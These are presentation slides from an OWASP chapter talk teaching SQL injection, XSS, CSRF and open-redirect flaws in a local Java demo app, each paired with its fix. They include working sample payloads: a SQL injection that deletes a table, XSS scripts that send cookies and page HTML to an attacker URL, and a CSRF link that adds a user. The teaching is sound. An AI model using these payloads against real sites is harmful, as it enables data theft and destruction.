Part 2
@JohnNKing“Injection flaws occur when an application sends untrusted data to an interpreter.” (OWASP Top 10)
interpret(code + input + moreCode);
The interpreter can't tell code and input apart
INSERT INTO comments VALUES ('Hello', '');
INSERT INTO comments VALUES (''', '');
INSERT INTO comments VALUES ('Look I am a mod!', 'John'); --', '');
INSERT INTO comments VALUES ('Uh oh...', '');
delete from comments;--', '');
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(
"INSERT INTO comments VALUES (' "
+ comment.getComment()
+ " ', ' "
+ comment.getUsername()
+ " ');");
Problem: User input is treated as SQL (even though it's enclosed in single quotes)
Parameterized Queries
PreparedStatement stmt = conn.prepareStatement(
"INSERT INTO comments VALUES (?, ?)");
stmt.setString(1, comment.getComment());
stmt.setString(2, comment.getUsername());
stmt.execute();
Which version of the code is cleaner?
Sub-optimal alternatives: SQL escaping, validation, or character stripping
Questions?
“XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.” (OWASP Top 10)
Does this sound a little familiar?
Hello
<b>Interesting...<b>
<script>alert(":P")</script>
<script>var img = new Image();
img.src = "http://localhost:8080/mal/?"
+ document.cookie;</script>
Fortunately, in this case, the session ID is HttpOnly.
However, an attacker could use this approach to exfiltrate user-specific site content. For example:
<script>document.addEventListener("DOMContentLoaded", function(e) {
var img = new Image();
img.src = "http://localhost:8080/mal/?html="
+ encodeURIComponent(document.documentElement.innerHTML);});
</script>
<% for (Comment comment : comments) { %>
<%= comment.getComment() %>
<% } %>
Problem: User input is treated as HTML
HTML Escaping
<% for (Comment comment : comments) { %>
<%= StringEscapeUtils.escapeHtml4(
comment.getComment()) %>
<% } %>
Questions?
http://localhost:8080/appsecdemo/error.jsp?error=;)
http://localhost:8080/appsecdemo/error.jsp?
error=<script>alert(":)");</script>
http://localhost:8080/appsecdemo/error.jsp?
error=<script>window.location=
"http://localhost:8080/mal/";</script>
Note: Some browsers will block this
“Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.” (OWASP Wiki)
http://localhost:8080/appsecdemo/AddUser?name=BadGuy
What happens if an attacker hits this link?
What about a moderator?
???
(Surface) Problem: We're allowing GET requests to AddUser
We should fix this, but that's not good enough!
<form action="/appsecdemo/AddUser" method="POST">
<input type="text" name="name">
<button type="submit">Add</button>
</form>
We need a way of distinguishing:
Note: Most of these defenses can be circumvented if there are XSS vulnerabilites!
Questions?
“Applications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.” (OWASP Top 10)
String destination = request.getParameter("destination");
...
response.sendRedirect(destination);
Problem: We're permitting any user provided destination
Don’t allow redirects, or validate destination parameters
String destination = "/appsecdemo/";
if ("addMod".equals(request.getParameter("destination"))) {
destination += "addMod.jsp";
}
response.sendRedirect(destination);
Questions?
@JohnNKing
JohnNKing.com/slides/owasp2017
github.com/JohnNKing/appsecdemo
Thank you to our host Nixon Peabody LLP
Rochester Chapter of OWASP
OWASP Top 10 Project
OWASP CSRFGuard Project
Slides made with Reveal.js